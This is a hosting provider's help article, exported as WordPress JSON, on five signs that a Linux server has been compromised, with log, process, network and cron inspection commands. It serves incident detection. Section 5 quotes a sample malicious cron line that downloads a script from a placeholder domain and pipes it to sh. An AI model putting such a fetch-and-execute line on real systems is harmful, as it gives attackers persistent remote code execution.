{"id":20108,"date":"2026-05-15T15:39:24","date_gmt":"2026-05-15T12:39:24","guid":{"rendered":"https:\/\/unihost.com\/help\/?p=20108"},"modified":"2026-05-15T15:39:24","modified_gmt":"2026-05-15T12:39:24","slug":"signs-that-server-was-hacked","status":"publish","type":"post","link":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","title":{"rendered":"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise"},"content":{"rendered":"<p data-start=\"79\" data-end=\"337\">A server compromise is not always obvious. Sometimes the website continues to work, SSH is available, the load looks normal, but the server may already have a malicious process, an unknown user, a hidden cron job, or outgoing traffic to suspicious addresses.<\/p>\n<p data-start=\"339\" data-end=\"571\">In cybersecurity, such signs are called <strong data-start=\"379\" data-end=\"407\">indicators of compromise<\/strong> \u2014 traces that may indicate hacking, infection, or unauthorized access. These signs are usually checked in logs, processes, network connections, and system changes.<\/p>\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>1. Suspicious SSH Logins<\/b><\/span><\/h2>\n<p data-start=\"602\" data-end=\"806\">The first thing to check is who logged in to the server and when. A common sign of compromise is a successful login from an unknown IP, at an unusual time, or under a user account that should not be used.<\/p>\n<p data-start=\"808\" data-end=\"828\">Check recent logins:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">last<\/span><\/pre>\n<p>Check failed login attempts:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo lastb<\/span><\/pre>\n<p>Check SSH logs on Debian\/Ubuntu:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo grep \"Accepted\" \/var\/log\/auth.log<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo grep \"Failed password\" \/var\/log\/auth.log<\/span><\/pre>\n<p>Using journalctl:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo journalctl -u ssh --since \"24 hours ago\"<\/span><\/pre>\n<p><strong>What to look for:<\/strong><\/p>\n<ul>\n<li>successful login from an unknown IP;<\/li>\n<li>login as root if root login should be disabled;<\/li>\n<li>many failed login attempts;<\/li>\n<li>login at an unusual time;<\/li>\n<li>login by a user you did not create.<\/li>\n<\/ul>\n<p>If you see a successful login from an unknown IP, this is already a serious reason to consider the server potentially compromised.<\/p>\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>2. Unknown Users, SSH Keys, or sudo Access<\/b><\/span><\/h2>\n<p data-start=\"1498\" data-end=\"1669\">After gaining access, an attacker often tries to persist in the system: create a new user, add an SSH key, grant themselves sudo privileges, or modify an existing account.<\/p>\n<p data-start=\"1671\" data-end=\"1701\">Check users with shell access:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">awk -F: '$7 ~ \/(bash|sh|zsh)$\/ {print $1, $7}' \/etc\/passwd<\/span><\/pre>\n<p>Check users with sudo access:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">getent group sudo<\/span><\/pre>\n<p>For AlmaLinux\/Rocky Linux\/CentOS:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">getent group wheel<\/span><\/pre>\n<p>Find all authorized_keys files:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo find \/home \/root -name authorized_keys -type f -print<\/span><\/pre>\n<p>Check the contents of the keys:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo cat \/root\/.ssh\/authorized_keys<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo cat \/home\/USER\/.ssh\/authorized_keys<\/span><\/pre>\n<p><strong>Suspicious signs:<\/strong><\/p>\n<ul>\n<li>an unknown user appeared;<\/li>\n<li>a user received sudo privileges;<\/li>\n<li>an unknown SSH key was added to authorized_keys;<\/li>\n<li>a new key appeared for root;<\/li>\n<li>permissions for .ssh or authorized_keys changed.<\/li>\n<\/ul>\n<p><strong>Important<\/strong><br data-start=\"2365\" data-end=\"2368\" \/>Do not delete suspicious data immediately if you plan to investigate. First, save logs and snapshots of the system state.<\/p>\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>3. Unknown Processes and High Load<\/b><\/span><\/h2>\n<p data-start=\"2530\" data-end=\"2774\">If the server starts heavily loading the CPU, RAM, disk, or network for no clear reason, this may be a sign of malicious activity. For example, a crypto miner, spam script, proxy, botnet client, or attack script may have appeared on the server.<\/p>\n<p data-start=\"2776\" data-end=\"2791\">Check the load:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">top (htop, atop)<\/span><\/pre>\n<p>Check processes:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">ps aux --sort=-%cpu | head<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">ps aux --sort=-%mem | head<\/span><\/pre>\n<p>Check systemd services:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">systemctl --type=service --state=running<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">systemctl --failed<\/span><\/pre>\n<p><strong>What to look for:<\/strong><\/p>\n<ul>\n<li>a process with an unclear name;<\/li>\n<li>a process started from \/tmp, \/var\/tmp, or \/dev\/shm;<\/li>\n<li>a service you did not install;<\/li>\n<li>high load without a clear reason;<\/li>\n<li>a process running as www-data, nobody, or an unknown user.<\/li>\n<\/ul>\n<p>Examples of suspicious paths:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">\/tmp\/.x\/<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">\/var\/tmp\/.cache\/<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">\/dev\/shm\/.run\/<\/span><\/pre>\n<p>Not every unfamiliar process means a hack, but an unknown process with high load and a strange launch path is a serious signal.<\/p>\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>4. Unusual Network Connections and Open Ports<\/b><\/span><\/h2>\n<p data-start=\"3531\" data-end=\"3699\">A compromised server often starts connecting to external IPs, sending spam, participating in DDoS attacks, working as a proxy, or opening a new port for remote control.<\/p>\n<p data-start=\"3701\" data-end=\"3723\">Check listening ports:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ss -tulpn<\/span><\/pre>\n<p data-start=\"3753\" data-end=\"3778\">Check active connections:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ss -tunap<\/span><\/pre>\n<p>View processes that use the network:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo lsof -i -P -n<\/span><\/pre>\n<p><strong>What should raise concern:<\/strong><\/p>\n<ul>\n<li>an unknown port is open;<\/li>\n<li>a service is listening on 0.0.0.0, although it should not be public;<\/li>\n<li>there are persistent connections to unknown IPs;<\/li>\n<li>the server actively connects to many external addresses, especially on ports 22, 25, 3390, 5900;<\/li>\n<li>an unknown proxy, tunnel, or reverse shell appeared.<\/li>\n<\/ul>\n<p data-start=\"4218\" data-end=\"4463\">NIST, in its incident handling guide, separately highlights data analysis and determining the correct response as an important part of incident handling. In practice, network connections, logs, and processes are among the first sources to check.<\/p>\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>5. Suspicious cron Jobs, Autostart, and Modified Files<\/b><\/span><\/h2>\n<p data-start=\"4524\" data-end=\"4658\">Attackers often add a cron job or systemd unit so that a malicious script starts again after a reboot or after the process is removed.<\/p>\n<p data-start=\"4660\" data-end=\"4690\">Check the current user\u2019s cron:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">crontab -l<\/span><\/pre>\n<p>Check root cron:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo crontab -l<\/span><\/pre>\n<p>Check system cron files:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ls -lah \/etc\/cron.d\/<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ls -lah \/etc\/cron.hourly\/<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ls -lah \/etc\/cron.daily\/<\/span><\/pre>\n<p data-start=\"4889\" data-end=\"4914\">Check systemd unit files:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">systemctl list-unit-files --type=service<\/span><\/pre>\n<p>View recently modified files:<\/p>\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo find \/etc \/var\/www \/tmp \/var\/tmp \/dev\/shm -type f -mtime -3 2&gt;\/dev\/null<\/span><\/pre>\n<p>Suspicious signs:<\/p>\n<ul>\n<li>a cron job with curl or wget pointing to an unknown URL;<\/li>\n<li>a script started from \/tmp, \/var\/tmp, or \/dev\/shm;<\/li>\n<li>a new systemd service with an unclear name;<\/li>\n<li>website files modified without your involvement;<\/li>\n<li>unknown PHP\/JS files in the website directory.<\/li>\n<\/ul>\n<p>Example of a suspicious line:<\/p>\n<p><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">* * * * * curl -fsSL http:\/\/unknown-domain.example\/run.sh | sh<\/span><\/p>\n<h3>What to Do If There Are Signs of a Hack<\/h3>\n<p>If one or more points match, it is better to treat the server as potentially compromised.<\/p>\n<p><strong>Minimum actions:<\/strong><\/p>\n<ul>\n<li>do not immediately delete all traces;<\/li>\n<li>save important logs;<\/li>\n<li>restrict access to the server;<\/li>\n<li>change passwords and SSH keys;<\/li>\n<li>check websites, databases, and cron;<\/li>\n<li>make a backup of important data;<\/li>\n<\/ul>\n<p>in case of a serious compromise, reinstall the server and restore only clean data.<\/p>\n<p data-start=\"5925\" data-end=\"6112\"><strong>Important<\/strong><br data-start=\"5934\" data-end=\"5937\" \/>If the server was used for payments, personal data, or client projects, it is better to conduct a full investigation and not limit yourself to deleting the suspicious process.<\/p>\n<h2 data-section-id=\"8dtpi\" data-start=\"6114\" data-end=\"6127\">Conclusion<\/h2>\n<p data-start=\"6129\" data-end=\"6178\">These were the 5 main signs of server compromise:<\/p>\n<ol>\n<li>Suspicious SSH logins<\/li>\n<li>Unknown users, keys, or sudo access<\/li>\n<li>Unknown processes and high load<\/li>\n<li>Unusual network connections and open ports<\/li>\n<li>Suspicious cron jobs, autostart, and modified files<\/li>\n<\/ol>\n<p>One sign does not always prove a hack, but several matches almost always require urgent investigation. It is better to act carefully: save logs, restrict access, check the system, and, if necessary, move the project to a clean server.<\/p>\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A server compromise is not always obvious. Sometimes the website continues to work, SSH is available, the load looks normal, but the server may already have a malicious process, an unknown user, a hidden cron job, or outgoing traffic to suspicious addresses. In cybersecurity, such signs are called indicators of compromise \u2014 traces that may [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[1094,237],"class_list":["post-20108","post","type-post","status-publish","format-standard","hentry","tag-compromise","tag-server"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>How to Tell If a Server Has Been Hacked<\/title>\n<meta name=\"description\" content=\"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to Tell If a Server Has Been Hacked\" \/>\n<meta property=\"og:description\" content=\"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\" \/>\n<meta property=\"og:site_name\" content=\"Unihost.FAQ\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/unihost\/\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-15T12:39:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unihost.com\/help\/minio.php?.\/unihost-logo-alt.png\" \/>\n\t<meta property=\"og:image:width\" content=\"250\" \/>\n\t<meta property=\"og:image:height\" content=\"141\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Unihost Support\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@unihost\" \/>\n<meta name=\"twitter:site\" content=\"@unihost\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Unihost Support\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\"},\"author\":{\"name\":\"Unihost Support\",\"@id\":\"https:\/\/unihost.com\/help\/#\/schema\/person\/bb5ae95f38577c920e6a7507888b715a\"},\"headline\":\"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise\",\"datePublished\":\"2026-05-15T12:39:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\"},\"wordCount\":860,\"publisher\":{\"@id\":\"https:\/\/unihost.com\/help\/#organization\"},\"keywords\":[\"Compromise\",\"server\"],\"inLanguage\":\"en\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\",\"url\":\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\",\"name\":\"How to Tell If a Server Has Been Hacked\",\"isPartOf\":{\"@id\":\"https:\/\/unihost.com\/help\/#website\"},\"datePublished\":\"2026-05-15T12:39:24+00:00\",\"description\":\"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.\",\"breadcrumb\":{\"@id\":\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#breadcrumb\"},\"inLanguage\":\"en\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Unihost\",\"item\":\"https:\/\/unihost.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Help\",\"item\":\"https:\/\/unihost.com\/help\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/unihost.com\/help\/#website\",\"url\":\"https:\/\/unihost.com\/help\/\",\"name\":\"Unihost.FAQ\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/unihost.com\/help\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/unihost.com\/help\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/unihost.com\/help\/#organization\",\"name\":\"Unihost\",\"alternateName\":\"Unihost\",\"url\":\"https:\/\/unihost.com\/help\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en\",\"@id\":\"https:\/\/unihost.com\/help\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/unihost.com\/help\/minio.php?2026\/01\/minio.png\",\"contentUrl\":\"https:\/\/unihost.com\/help\/minio.php?2026\/01\/minio.png\",\"width\":300,\"height\":300,\"caption\":\"Unihost\"},\"image\":{\"@id\":\"https:\/\/unihost.com\/help\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/unihost\/\",\"https:\/\/x.com\/unihost\",\"https:\/\/www.instagram.com\/unihost\/?hl=en\",\"https:\/\/www.linkedin.com\/company\/unihost-com\",\"https:\/\/www.youtube.com\/channel\/UCITKsxMDnslQY8brN3advgw\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/unihost.com\/help\/#\/schema\/person\/bb5ae95f38577c920e6a7507888b715a\",\"name\":\"Unihost Support\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en\",\"@id\":\"https:\/\/unihost.com\/help\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g\",\"caption\":\"Unihost Support\"},\"sameAs\":[\"https:\/\/unihost.com\/\"],\"url\":\"https:\/\/unihost.com\/help\/author\/support\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to Tell If a Server Has Been Hacked","description":"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","og_locale":"en_US","og_type":"article","og_title":"How to Tell If a Server Has Been Hacked","og_description":"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.","og_url":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","og_site_name":"Unihost.FAQ","article_publisher":"https:\/\/www.facebook.com\/unihost\/","article_published_time":"2026-05-15T12:39:24+00:00","og_image":[{"width":250,"height":141,"url":"https:\/\/unihost.com\/help\/minio.php?.\/unihost-logo-alt.png","type":"image\/png"}],"author":"Unihost Support","twitter_card":"summary_large_image","twitter_creator":"@unihost","twitter_site":"@unihost","twitter_misc":{"Written by":"Unihost Support","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#article","isPartOf":{"@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/"},"author":{"name":"Unihost Support","@id":"https:\/\/unihost.com\/help\/#\/schema\/person\/bb5ae95f38577c920e6a7507888b715a"},"headline":"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise","datePublished":"2026-05-15T12:39:24+00:00","mainEntityOfPage":{"@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/"},"wordCount":860,"publisher":{"@id":"https:\/\/unihost.com\/help\/#organization"},"keywords":["Compromise","server"],"inLanguage":"en"},{"@type":"WebPage","@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","url":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","name":"How to Tell If a Server Has Been Hacked","isPartOf":{"@id":"https:\/\/unihost.com\/help\/#website"},"datePublished":"2026-05-15T12:39:24+00:00","description":"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.","breadcrumb":{"@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#breadcrumb"},"inLanguage":"en","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Unihost","item":"https:\/\/unihost.com\/"},{"@type":"ListItem","position":2,"name":"Help","item":"https:\/\/unihost.com\/help\/"},{"@type":"ListItem","position":3,"name":"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise"}]},{"@type":"WebSite","@id":"https:\/\/unihost.com\/help\/#website","url":"https:\/\/unihost.com\/help\/","name":"Unihost.FAQ","description":"","publisher":{"@id":"https:\/\/unihost.com\/help\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unihost.com\/help\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en"},{"@type":"Organization","@id":"https:\/\/unihost.com\/help\/#organization","name":"Unihost","alternateName":"Unihost","url":"https:\/\/unihost.com\/help\/","logo":{"@type":"ImageObject","inLanguage":"en","@id":"https:\/\/unihost.com\/help\/#\/schema\/logo\/image\/","url":"https:\/\/unihost.com\/help\/minio.php?2026\/01\/minio.png","contentUrl":"https:\/\/unihost.com\/help\/minio.php?2026\/01\/minio.png","width":300,"height":300,"caption":"Unihost"},"image":{"@id":"https:\/\/unihost.com\/help\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/unihost\/","https:\/\/x.com\/unihost","https:\/\/www.instagram.com\/unihost\/?hl=en","https:\/\/www.linkedin.com\/company\/unihost-com","https:\/\/www.youtube.com\/channel\/UCITKsxMDnslQY8brN3advgw"]},{"@type":"Person","@id":"https:\/\/unihost.com\/help\/#\/schema\/person\/bb5ae95f38577c920e6a7507888b715a","name":"Unihost Support","image":{"@type":"ImageObject","inLanguage":"en","@id":"https:\/\/unihost.com\/help\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g","caption":"Unihost Support"},"sameAs":["https:\/\/unihost.com\/"],"url":"https:\/\/unihost.com\/help\/author\/support\/"}]}},"_links":{"self":[{"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/posts\/20108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/comments?post=20108"}],"version-history":[{"count":1,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/posts\/20108\/revisions"}],"predecessor-version":[{"id":20109,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/posts\/20108\/revisions\/20109"}],"wp:attachment":[{"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/media?parent=20108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/categories?post=20108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unihost.com\/help\/wp-json\/wp\/v2\/tags?post=20108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}